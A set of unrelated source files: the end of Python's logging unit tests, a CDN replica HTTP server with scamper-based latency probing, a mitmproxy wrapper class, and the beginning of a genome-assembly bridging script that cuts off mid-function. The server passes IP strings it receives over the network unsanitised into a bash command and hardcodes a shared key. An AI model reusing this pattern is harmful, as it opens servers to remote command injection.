self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
# bpo-45401 - test with special file
# We set maxBytes to 1 so that rollover would normally happen, except
# for the check for regular files
rh = logging.handlers.RotatingFileHandler(
os.devnull, encoding="utf-8", maxBytes=1)
self.assertFalse(rh.shouldRollover(self.next_rec()))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.replace(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib()
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
def test_should_not_rollover(self):
# See bpo-45401. Should only ever rollover regular files
fh = logging.handlers.TimedRotatingFileHandler(
os.devnull, 'S', encoding="utf-8", backupCount=1)
time.sleep(1.1) # a little over a second ...
r = logging.makeLogRecord({'msg': 'testing - device file'})
self.assertFalse(fh.shouldRollover(r))
fh.close()
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def test_compute_files_to_delete(self):
# See bpo-46063 for background
wd = tempfile.mkdtemp(prefix='test_logging_')
self.addCleanup(shutil.rmtree, wd)
times = []
dt = datetime.datetime.now()
for i in range(10):
times.append(dt.strftime('%Y-%m-%d_%H-%M-%S'))
dt += datetime.timedelta(seconds=5)
prefixes = ('a.b', 'a.b.c', 'd.e', 'd.e.f')
files = []
rotators = []
for prefix in prefixes:
p = os.path.join(wd, '%s.log' % prefix)
rotator = logging.handlers.TimedRotatingFileHandler(p, when='s',
interval=5,
backupCount=7,
delay=True)
rotators.append(rotator)
if prefix.startswith('a.b'):
for t in times:
files.append('%s.log.%s' % (prefix, t))
else:
rotator.namer = lambda name: name.replace('.log', '') + '.log'
for t in times:
files.append('%s.%s.log' % (prefix, t))
# Create empty files
for fn in files:
p = os.path.join(wd, fn)
with open(p, 'wb') as f:
pass
# Now the checks that only the correct files are offered up for deletion
for i, prefix in enumerate(prefixes):
rotator = rotators[i]
candidates = rotator.getFilesToDelete()
self.assertEqual(len(candidates), 3)
if prefix.startswith('a.b'):
p = '%s.log.' % prefix
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.startswith(p))
else:
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.endswith('.log'))
self.assertTrue(fn.startswith(prefix + '.') and
fn[len(prefix) + 2].isdigit())
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
def setUpModule():
cm = support.run_with_locale('LC_ALL', '')
cm.__enter__()
unittest.addModuleCleanup(cm.__exit__, None, None, None)
if __name__ == "__main__":
unittest.main()
|
httpserver.py
|
#!/usr/bin/env python3
import socket
import os
import http.client
import subprocess
import sys
import gzip
import threading
import time
import signal
PORT = -1
ORIGIN_PORT = 8080
ORIGIN_HOST = ''
SOCK = None
DNS_KEY = 'jds1D41HPQ2110D85ef92jdaf341kdfasfk123154'
'''
Will be called as follows:
./httpserver -p <port> -o <origin>
'''
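# Illustrative invocation (hostname/port are placeholders, not from the original):
#   ./httpserver -p 20380 -o origin.example.com
# main() below reads sys.argv[2] as the port and sys.argv[4] as the origin host.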
def handle_kill(*args):
'''
Closes the socket upon PID kill or terminating character
:param args: None
:return: None
'''
if SOCK is not None:
SOCK.close()
def listen():
'''
    Listens for requests coming in from clients
:return: None
'''
global SOCK
# Gets the host name
hostname = socket.gethostname()
# Gets the host IP Address
ip_addr = socket.gethostbyname(hostname)
# Creates a socket connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Binds socket to host IP Address and port
sock.bind((ip_addr, PORT))
# Listens on the socket connection for a request
sock.listen(10)
# collect sock in global variable so it can be closed on kill pid
SOCK = sock
# now that SOCK is socket, set handle_kill to close socket
signal.signal(signal.SIGTERM, handle_kill)
signal.signal(signal.SIGINT, handle_kill)
# gets the connection and address
while True:
connection, address = sock.accept()
# gets message from client
message = connection.recv(1024)
# parse the message to get the data
# Name of the webpage
resource = parseGET(message.decode())
# check cache for content client is asking for
# if looking for active measurements, start thread with measurements
if resource == DNS_KEY:
            # create new thread so socket can continue to serve requests
measure_thread = threading.Thread(target=doActiveMeasurements, args=(connection, message))
measure_thread.start()
# otherwise, serve info from connection
# no local writes, only reads, don't worry about locking
else:
serve_thread = threading.Thread(target=serveRequest, args=(connection, resource))
serve_thread.start()
def serveRequest(connection: socket.socket, resource):
'''
Serves a request from the server to the client.
:param connection: socket object for given client
:param resource: what the client is looking for
:return: None
'''
# find the resource
split_resource = resource.split('/')
cache_return = None
if len(split_resource) > 0:
# get the file being looked for
cache_resource = split_resource[-1]
# search the cache for the given resource (without /wiki/ or any prior path)
cache_return = cacheSearch(cache_resource + '.html.gz', '/cache_zip')
# if found in cache, get that content from cache and send to client
if cache_return is not None:
# create 200 response and send back byte content to client
connection.send(get200Response(len(cache_return)) + cache_return)
else:
# otherwise connect to origin and get content from there
# sends entire resource, /wiki/<resource> or otherwise
content = connectOrigin(resource)
        # if no error, return response from server, good or bad
if content is not None:
# send content from origin back to client
connection.send(content)
# if error with http.client - error returns None, send back manual "bad request"
else:
connection.send(getBadResponse().encode())
# close connection
connection.close()
def get200Response(size: int):
'''
Creates 200 response headers for cache hit.
:param size: size of the content
:return: headers for content request
'''
res_string = 'HTTP/1.1 200 OK\r\n'
res_string += 'Content-Length: ' + str(size) + '\r\n'
res_string += 'Content-Type: text/html; charset=UTF-8\r\n\r\n'
return res_string.encode()
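# Example (illustrative): get200Response(5) returns
#   b'HTTP/1.1 200 OK\r\nContent-Length: 5\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n'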
def getBadResponse():
'''
Creates bad request response when error with http.client request
:return: header for bad request
'''
res_string = 'HTTP/1.1 400 BAD REQUEST\r\n\r\n'
return res_string
def parseGET(request):
'''
Parse the GET request
:param request: String HTTP GET request
:return: The resource to be found
'''
# split by spaces
request_list = request.split()
# find the resource
resource = request_list[1]
return resource
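# Example (illustrative): parseGET('GET /wiki/Foo HTTP/1.1\r\nHost: h\r\n\r\n') returns '/wiki/Foo'.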
def cacheSearch(resource, cache):
'''
Search through cache to see if resource is already stored
:param cache:
:param resource: resource/file name searching for
:return: return content searching for, or return nothing
'''
# get path to the cache directory
path = os.getcwd() + cache
# get current list of files in the cache directory
dir = os.listdir(path)
# if empty directory
if (len(dir) == 0):
return None
# otherwise if cache is not empty and
# if the resource is in the cache directory
elif resource in dir:
# get entry for resource file
index = dir.index(resource)
file_dir = dir[index]
# open file, get unzipped contents, close file and return contents
f = gzip.open(os.getcwd() + '/cache_zip/' + file_dir, 'r')
contents = f.read()
f.close()
# return contents
return contents
def connectOrigin(request):
'''
    Connects the replica server to the origin and forwards the client GET request
:param request: String http get request from client
:return:
'''
# try to connection to origin
try:
# connect to Origin
conn = http.client.HTTPConnection(ORIGIN_HOST, ORIGIN_PORT)
# set string to access from server
access_content = 'http://' + ORIGIN_HOST + ':' + str(ORIGIN_PORT) + request
# forward along GET request from client
conn.request('GET', access_content)
# get the response from origin
t = conn.getresponse()
        # if status is OK
if t.status == 200:
# return the string of the content to be added to the cache
content = t.read()
return get200Response(len(content)) + content
# otherwise return response provided by server
else:
return b'HTTP/1.1 ' + str(t.status).encode() + b'\n' + t.headers.__bytes__()
# otherwise return None to send back generic error response
except http.client.HTTPException:
return None
def doActiveMeasurements(connection: socket.socket, client_ip_data: bytes):
'''
Performs active measurements on IPs given by DNS server
:param connection: connection to DNS server
:param client_ip_data: IPs to search for
:return: None
'''
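    # Wire format sketch (inferred from the parsing below, not a documented protocol):
    #   the last line of the request holds '*'-separated client IPs, e.g. '1.2.3.4*5.6.7.8*'
    #   the response body is '--'-joined 'ip::rtt' pairs, e.g. '1.2.3.4::12.345--5.6.7.8::23.456'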
# get the formatted string with IPS
info = client_ip_data.decode().split('\n')[-1]
# split IPs and place into list, removing all empty spaces
# split by '*' char
ips = list(filter(None, info.split('*')))
# create lock to add IP data concurrently
ip_data_lock = threading.Lock()
ip_data = []
# create list to track all threads
meas_threads = []
# iterate through all IPs requested by DNS server
for ip in ips:
# if empty string, ignore
if ip == '':
continue
# create a thread that probes the given IP address
meas_thread = threading.Thread(target=measureClient, args=(ip, ip_data, ip_data_lock))
meas_threads.append(meas_thread)
meas_thread.start()
# limit probes to 1 per second
time.sleep(1)
# wait for all threads to finish before sending data back
for thread in meas_threads:
thread.join()
# format data to be sent back
res_data = '--'.join(ip_data)
# encode data and send back with 200 response
res = res_data.encode()
connection.send(get200Response(len(res)) + res)
connection.close()
def measureClient(ip, ip_data, ip_data_lock: threading.Lock):
'''
Measures the RTT to the closest public server to the given client IP.
:param ip: client IP to probe
:param ip_data: holds rtts for all IPs requested by DNS server
:param ip_data_lock: lock that prevents multi-write on ip_data
:return: None
'''
    # create new subprocess
process = subprocess.Popen(['/bin/bash'],
shell=True,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
# trace -q 1 specifies number of attempts per hop (1)
    # trace -w 1 specifies the time to wait for a response, set to 1; if it takes more than 1 there's a problem, try a different route
cmd = 'scamper -c "trace -q 1 -w 1" -i ' + ip + '\n'
# send command and wait for response from subprocess
out, err = process.communicate(cmd.encode())
data = out.decode()
# get all hops to destination server
lines = data.split('\n')
# work backwards from ip closest to host
i = len(lines) - 1
# denotes closest public IP to server in traceroute results
closest_ip = ''
# holds last private IP to server in traceroute results -- backup, refrain from relying on this
last_private = None
# holds information about last line checked
line_data = []
    # work backwards from the end of the traceroute to find the closest public ip to the address
while i >= 0:
# get current line to evaluate
line = lines[i]
# get information about this hop
line_data = list(filter(None, line.split(' ')))
        # if line_data has 4 fields, successful probe
if len(line_data) == 4:
# find IPv4 address fields
fields = line_data[1].split('.')
# if private or vm ip, continue searching
if fields[0] == '10' \
or (fields[0] == '172' and 16 <= int(fields[1]) <= 31) \
                or (fields[0] == '192' and fields[1] == '168') \
or (fields[0] == '100' and 64 <= int(fields[1]) <= 127):
# collect private ip closest to client in case no public ips are found
if last_private is None:
last_private = line_data
i -= 1
continue
# else is public ip, use this as closest entry to un-pingable ip
else:
closest_ip = line_data[1]
break
i -= 1
# if all private ip addresses, use ping from closest private ip to client
if i < 0:
# if no private ip addresses in traceroute, no route found, cannot validate this value
# set to high number so it is not chosen
if last_private is None:
data_string = ip + '::999.99'
# otherwise, get ping for closest private ip to destination
else:
data_string = ip + '::' + last_private[2]
# lock ip_data list to write data for this client
ip_data_lock.acquire()
ip_data.append(data_string)
ip_data_lock.release()
# otherwise, public ip entry point has been found
else:
# ping the closest ip
process = subprocess.Popen(['/bin/bash'],
shell=True,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
cmd = 'scamper -c ping -i ' + closest_ip + '\n'
out, err = process.communicate(cmd.encode())
# decode results of ping
ping_info = out.decode()
# if no packets received, set ip to ping from traceroute - not great, but generally accurate
# based on empirical findings
if '0 packets received' in ping_info:
data_string = ip + '::' + line_data[2]
# otherwise, collect average
else:
avg_lat = ping_info.split('\n')[-2].split(' ')[3].split('/')[1]
data_string = ip + '::' + avg_lat
# lock ip_data list to write data for this client
ip_data_lock.acquire()
ip_data.append(data_string)
ip_data_lock.release()
def main():
'''
Runs the http server.
:return: None
'''
global ORIGIN_HOST
global PORT
    # gets the port and origin from the command line: -p <port> -o <origin>
    PORT = int(sys.argv[2])
    ORIGIN_HOST = sys.argv[4]
    # start listening for client requests
    listen()
# run the server
main()
|
proxy.py
|
import asyncio
import sys
import threading
import traceback
from abc import ABCMeta, abstractmethod
import mitmproxy.http
import mitmproxy.tcp
import mitmproxy.websocket
from mitmproxy.options import Options
from mitmproxy.proxy.config import ProxyConfig
from mitmproxy.proxy.server import ProxyServer
from mitmproxy.tools.dump import DumpMaster
class Proxy:
def __init__(self, listen_host='0.0.0.0', listen_port=8080, http2=True, **kwargs):
options = Options(listen_host=listen_host, listen_port=listen_port, http2=http2, **kwargs)
self.dump_master = DumpMaster(options, with_termlog=False, with_dumper=False)
self.dump_master.server = ProxyServer(ProxyConfig(options))
self.proxy_thread = threading.Thread(target=self._run_loop, args=(asyncio.get_event_loop(),))
def add_addon(self, addon):
self.dump_master.addons.add(addon)
    def remove_addon(self, addon):
        self.dump_master.addons.remove(addon)
def _run_loop(self, loop):
exc = None
try:
loop.run_forever()
except Exception: # pragma: no cover
exc = traceback.format_exc()
finally:
if not self.dump_master.should_exit.is_set(): # pragma: no cover
self.dump_master.shutdown()
tasks = asyncio.all_tasks(loop)
for p in tasks:
p.cancel()
loop.close()
if exc: # pragma: no cover
print(exc, file=sys.stderr)
print("mitmproxy has crashed!", file=sys.stderr)
print("Please lodge a bug report at:", file=sys.stderr)
print("\thttps://github.com/mitmproxy/mitmproxy", file=sys.stderr)
self.dump_master.addons.trigger("done")
def _run(self):
self.dump_master.start()
asyncio.ensure_future(self.dump_master.running())
def start(self):
self._run()
self.proxy_thread.start()
def stop(self):
self.dump_master.shutdown()
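# Usage sketch (illustrative; `MyAddon` is a hypothetical mitmproxy addon class, not part of this module):
#   proxy = Proxy(listen_host='127.0.0.1', listen_port=8080)
#   proxy.add_addon(MyAddon())
#   proxy.start()
#   ...          # traffic is intercepted via the addon's request/response hooks
#   proxy.stop()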
|
bridger.py
|
#! /usr/bin/python
import sys, os
import paramsparser
import PAFutils
import math
import random
import time
from datetime import datetime
# To enable importing from samscripts submodule
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(SCRIPT_PATH, 'samscripts/src'))
# import utility_sam
from fastqparser import read_fastq
from PAFutils import load_paf
from graphs import *
import multiprocessing
SImin = .30 # Minimum sequence identity for the BRIDGING algorithm
# testing will be required to find the optimal value
# NOTE: current value is very low!
OHmax = .30 # Maximum allowed overhang percentage, relative to aligned length
MinMCPaths = 10 # Minimum number of paths generated by Monte Carlo method
HardNodeLimit = 1000 # Maximum allowed number of nodes in a path, paths with a larger number of nodes will not be generated
SoftNodeLimit = 100 # A number of nodes in a path after which a warning will be printed
# Direction of extending a contig with reads
directionLEFT = 1
directionRIGHT = 0
def reverseDirection(direction):
if direction == directionLEFT:
return directionRIGHT
elif direction == directionRIGHT:
return directionLEFT
else:
return direction
compbase = {'A' : 'T',
'T' : 'A',
'C' : 'G',
'G' : 'C',
'N' : 'N'}
# Parameter definitions for paramsparser
paramdefs = {'--version' : 0,
'-v' : 0,
'-o' : 1,
'--output' : 1,
'-t' : 1,
'--threads' : 1,
'--print-graph' : 0,
'--check-paths' : 0,
'--SImin' : 1,
'--OHmax' : 1,
'--MinMCPaths' : 1,
'--MaxNodesInPath' : 1}
# A function that loads global parameters from paramdict dictionary
def load_global_parameters(paramdict):
global SImin, OHmax, MinMCPaths, HardNodeLimit
if '--SImin' in paramdict:
SImin = float(paramdict['--SImin'][0])
if '--OHmax' in paramdict:
OHmax = float(paramdict['--OHmax'][0])
if '--MinMCPaths' in paramdict:
MinMCPaths = int(paramdict['--MinMCPaths'][0])
if '--MaxNodesInPath' in paramdict:
HardNodeLimit = int(paramdict['--MaxNodesInPath'][0])
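# Example (illustrative): running with '--SImin 0.4 --OHmax 0.25' presumably makes paramsparser
# store {'--SImin': ['0.4'], '--OHmax': ['0.25']} in paramdict, so load_global_parameters()
# sets SImin = 0.4 and OHmax = 0.25 (inferred from the paramdict[...][0] accesses above).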
# Function that tests whether an overlap (PAF line) is usable or not
# Overall, an overlap is not usable if:
# - one read contains the other - returns -1
# - length of the aligned part is too short compared to overhangs - returns -2
# - mapping quality is too low - returns -3
# - extension scores are zero or negative on both ends - returns -4
# If the overlap is usable, the function returns 1
def test_overlap(pafline, reads_to_discard, test_contained_reads = True, test_short_length = True, test_low_quality = True):
    # Fixing PAF line attributes so that they are strand independent
# KK: I think this is not correct!!
# if pafline['STRAND'] == '-':
# tstart = pafline['TSTART']
# tend = pafline['TEND']
# tlen = pafline['TLEN']
# new_tstart = tlen - tend
# new_tend = tlen - tstart
# pafline['TSTART'] = new_tstart
# pafline['TEND'] = new_tend
QOH1 = pafline['QSTART'] # Query left overhang
QOH2 = pafline['QLEN'] - pafline['QEND'] # Query right overhang
TOH1 = pafline['TSTART'] # Target left overhang
TOH2 = pafline['TLEN'] - pafline['TEND'] # Target right overhang
    # KK: Fixing derived target attributes so that they are strand independent
# If Query and target are on a different strand, target overhang values have to be switched
if pafline['STRAND'] == '-':
TOH1 = pafline['TLEN'] - pafline['TEND']
TOH2 = pafline['TSTART']
QOL = pafline['QEND'] - pafline['QSTART'] + 1 # Query overlap length
TOL = pafline['TEND'] - pafline['TSTART'] + 1 # Target overlap length
SI = float(pafline['NRM']) / pafline['ABL'] # Sequence identity
# TODO: check if this is correctly calculated
    # PAF file might not give us completely correct information
avg_ovl_len = (QOL + TOL)/2
OS = avg_ovl_len * SI # Overlap score
QES1 = OS + TOH1/2 - (QOH1 + TOH2)/2 # Extension score for extending Query with Target to the left
QES2 = OS + TOH2/2 - (QOH2 + TOH1)/2 # Extension score for extending Query with Target to the right
TES1 = OS + QOH1/2 - (QOH2 + TOH1)/2 # Extension score for extending Target with Query to the left
TES2 = OS + QOH2/2 - (QOH1 + TOH2)/2 # Extension score for extending Target with Query to the right
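    # Worked example (illustrative numbers, '+' strand): QLEN=TLEN=1000, QSTART=800, QEND=1000,
    # TSTART=0, TEND=200, NRM=180, ABL=200 gives QOH1=800, QOH2=0, TOH1=0, TOH2=800,
    # QOL=TOL=201, SI=0.9, OS~180.9, so QES2 and TES1 are large and positive
    # (the target extends the query to the right, the query extends the target to the left),
    # while QES1 and TES2 come out negative.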
    # KK: Fixing derived target attributes so that they are strand independent
    # If Query and target are on a different strand, target extension scores should be switched
# Because the point of view is from Target perspective
if pafline['STRAND'] == '-':
TES2 = OS + QOH1/2 - (QOH2 + TOH1)/2 # Extension score for extending Target with Query to the left
TES1 = OS + QOH2/2 - (QOH1 + TOH2)/2 # Extension score for extending Target with Query to the right
    # NOTE: This seems logical:
    # If a query extends further right or left than the target, it makes no sense to extend it in that direction
# Therefore setting a corresponding extension score to 0, I need to be mindful of relative strand
if QOH1 >= TOH1:
QES1 = 0
else:
if pafline['STRAND'] == '+':
TES1 = 0
else:
TES2 = 0
if QOH2 >= TOH2:
QES2 = 0
else:
if pafline['STRAND'] == '+':
TES2 = 0
else:
TES1 = 0
minQOH = QOH1 if QOH1 < QOH2 else QOH2 # Smaller query overhang, will be used to determine if the overlap is discarded
minTOH = TOH1 if TOH1 < TOH2 else TOH2 # Smaller target overhang, will be used to determine if the overlap is discarded
